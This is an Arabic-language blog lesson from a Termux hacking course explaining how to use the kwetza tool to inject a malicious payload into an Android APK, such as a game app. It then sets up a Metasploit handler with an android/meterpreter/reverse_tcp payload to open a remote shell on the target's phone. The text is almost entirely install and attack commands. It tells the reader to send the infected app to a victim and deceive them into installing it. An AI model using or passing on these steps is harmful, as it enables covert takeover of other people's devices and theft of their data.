السلام عليكم ورحمة الله وبركاته اهلا بكم اعزائي المتابعين من كل مكان في درس جديد من دورة تعليم التيرميكس واليوم هو الدرس الثالث عشر من الدورة
بعنوان"دمج بايلود في التطبيقات وإختراق الاجهزة"
اقدم لكم اداة kwetza وتستخدم لدمج باليود ملغم بتطبيقات الاندرويد APK
المرحلة الاولي وهيا مرحلة التثبيت:
تثبيت أداة kwetza
اولا نكتب الامر التالي
- pip install beautifulsoup4
بعد ذلك نقوم بتنزيل الاداه
- git clone https://github.com/sensepost/kwetza.git
طريقة إستخدام kwetza
- python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
- nameOfTheApkToInfect.apk
الملف الذي تريد عمل حقن له (تطبيق ألعاب...)
مثال :
- python kwetza.py testhack.apk 192.168.1.1 4444 yes
يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
- kwetza/testhack/dist/testhack.apk
بعد حقن التطبيق وارساله للضحيه وبطريقتك تخدع الضحيه لتثبيت التطبيق
نفتح اداة الميتاسبلويت
بعد الدخول علي اداه MetaSploit ندخل الاوامر التاليه بالترتيب حسب الهوست والبورت الي انت حقنت فيه التطبيق
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost 192.168.1.1
- set lport 4444
- exploit
- help
Post a Comment